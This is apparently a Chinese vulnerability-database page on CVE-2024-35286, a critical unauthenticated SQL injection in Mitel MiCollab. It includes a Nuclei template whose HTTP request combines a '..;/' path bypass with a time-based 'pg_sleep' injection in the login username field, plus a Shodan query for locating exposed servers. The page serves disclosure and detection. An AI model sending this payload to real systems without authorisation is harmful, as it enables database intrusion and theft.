CVE-2024-35286: Mitel MiCollab <= 9.8.0.33 - SQL Injection

日期: 2025-08-01 | 影响软件: Mitel MiCollab | POC: 已公开

漏洞描述

A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations.

PoC代码[已公开]

id: CVE-2024-35286

info:
  name: Mitel MiCollab <= 9.8.0.33 - SQL Injection
  author: daffainfo
  severity: critical
  description: |
    A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries to access sensitive information and execute arbitrary database and management operations.
  remediation: |
    Update Mitel MiCollab to a version later than 9.8.0.33.
  reference:
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0014
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-35286
    epss-score: 0.60515
    epss-percentile: 0.9822
    cwe-id: CWE-89
    cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: micollab
    shodan-query: html:"Mitel" html:"MiCollab"
  tags: cve,cve2024,mitel,micollab,sqli,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        POST /npm-pwg/..;/npm-admin/login.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        subAction=basicLogin&username=test'||pg_sleep(6)--&password=test&clusterIndex=0

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 500'
          - 'contains_any(body, "com.mitel.npm.web.console", "java.lang.NullPointerException")'
          - 'contains(set_cookie, "JSESSIONID=")'
        condition: and
# digest: 4a0a0047304502207e88016c201d1f547c6cc371b8ecfaca93ed3d0d1abcd56a716923560b167dd502210086d296d991545aa4843e53edc1cb04920fd856ad0d0243d9ef057b3f678df7b1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐